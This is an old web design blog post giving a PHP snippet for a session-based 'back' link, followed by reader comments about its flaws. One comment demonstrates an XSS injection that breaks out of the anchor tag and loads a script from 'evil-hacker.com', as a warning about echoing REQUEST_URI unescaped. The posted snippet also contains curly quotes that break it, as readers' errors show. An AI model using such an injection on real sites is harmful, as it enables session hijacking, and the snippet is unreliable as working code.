Dezinerfolio

Back to Previous Page (PHP)

Wed, 01/09/2008 - 00:16 — dfadmin
Your rating: None Average: 4.1 (16 votes)

While working on one of our projects we came across a requirement which was basically a Link which takes you to the previous page within the same site.

We googled and found a lot of ways which were complex. After giving it a thought, we just figured out that its a very simple logic with a few lines of code.

Well, our requirement was for a Drupal site so got the logic on PHP. Here it goes [sharing is our policy] :

<?php session_start(); ?> <!-- Starting a session before the DOCTYPE -->

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<a href="<?php echo $_SESSION['back']; ?>">back</a> <!--The anchor tag that links to the previous page -->

<?php $_SESSION[’back’] = htmlentities($_SERVER[’REQUEST_URI’]); ?>  <!-- Assigning the current URL to a session variable -->

Please note that first we assign the previous session variable to the anchor tag and only then re-assign the current URL to the session variable which will be read when you move on to the next page.

This being a simple PHP snippet can be used in almost every CMS (PHP based) and sure is a good addon to the accessibility of your site.

Trackback URL for this post:

http://www.dezinerfolio.com/trackback/148

Similar entries

Comments

Anonymous's picture

The one problem with this method is if a user has multiple browsers open on the same site. The sessions get miffed up and copy over to each browser session.

Anonymous (not verified)
Wed, 12/17/2008 - 21:36
Anonymous's picture

This is really cool since IE has JS switched off by default.

This whole MS stupid game is utter madness and makes life hell for web designers/developers (esp. inexperienced ones like me).

Thanks to dezignerfolio and sites with a similar mentality of assisting each other, sanity is still alive and well on the net.

Thanks also for the dfGrid 1.0
Fascinating ... I must investigate prototype

cha
t3rry

t3rry (not verified)
Thu, 05/01/2008 - 13:31
Anonymous's picture

Hmmm, I'm not sure why Melanie Baker and I are having the same problem. I am clearly a neophyte, but I have done a little php coding before. Here however I just don't know what constitutes a "session." Am I to put all the code you indicated above into a single page of my Drupal site? Am I to put it on every page? Certain pages? Some of it on one page and some of it on the referred-to pages? I just don't know. But my "back" link keeps getting set to:
http://www.normanbobrow.com/”“
which is of course a page that doesn't exist.

Please if you could add a few more words of explanation, it would really help us out a lot. Thanks.

Keith Gardner (not verified)
Sun, 04/27/2008 - 15:45
Anonymous's picture

Hi i'm having trouble with this code, I keep getting the message : The requested URL /”“ was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Any suggestions?? Thanks

Melanie Baker (not verified)
Thu, 04/24/2008 - 20:48
Anonymous's picture

Good stuff. On a side note, I really dig your work, awesome style all around.

atom (not verified)
Wed, 01/09/2008 - 20:13
dfadmin's picture

@atom - totally agree, users can use htmlentities to strip the characters so that no script tag loads...
Thanks for the healthy arguments, this helps us too to understand concepts better.

I will rewrite the post adding html entities

dfadmin
Wed, 01/09/2008 - 17:02
Anonymous's picture

I'm impressed nobody said this only works if the user opens only one page at a time. If you happen to open more than one window of the site, clicking on a link of an "old" (not the immediate last) window will get wrong results.

IMHO, the best solution still is http referrers (filtering out referrers from other domains, naturally).

Romulo (not verified)
Wed, 01/09/2008 - 13:31
Anonymous's picture

@dfadmin

Yes, it works fine, for you. As stated in my first comment this behavior("is by default urlencoded") is not universal, and is entirely dependent on the configuration of the server. An inexperienced user may not have any idea how their server is configured, especially if they are using one of the many popular hosts who are far more concerned with convenience than security.

This method should not be used in any distributed software, as you will never be sure the type of configuration the server will have.

To anyone reading this:

Do yourself a favor and wrap any output in htmlentites().

atom (not verified)
Wed, 01/09/2008 - 08:55
dfadmin's picture

@atom - I just took the code as mentioned and just dumped into a php file.
Then i tried inserting the XSS attack that you mentioned and i got html code as below
back
This shows that any GET parameters that you pass in the URL is by default urlencoded and hence the insert will be just as a string and not HTML.

- Navin

dfadmin
Wed, 01/09/2008 - 07:12
Anonymous's picture

@dfadmin - You are mistaken here, the point is not to include the url in the a tag, it is to break out of that tag and then run the code you want to. People who craft xss attacks are clever, and will figure out how to run the code if you give them a chance.

Accessed:

http://site.com/?"><script src="http://evil-hacker.com/ruin-everything.js"></script><a href="#

Your back link:
<a href=""><script src="http://evil-hacker.com/ruin-everything.js"></script><a href="#">back</a>

In the above example, the script gets executed, someone hijacks your wordpress session, and then proceeds to ruin your site.

atom (not verified)
Wed, 01/09/2008 - 06:33

Post new comment

The content of this field is kept private and will not be shown publicly.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.
    Cool links you must check out Images we love
    © 2007 - 2009 Dezinerfolio. All Rights Reserved.
    Drupal Subscribe

    Tags

    Sponsors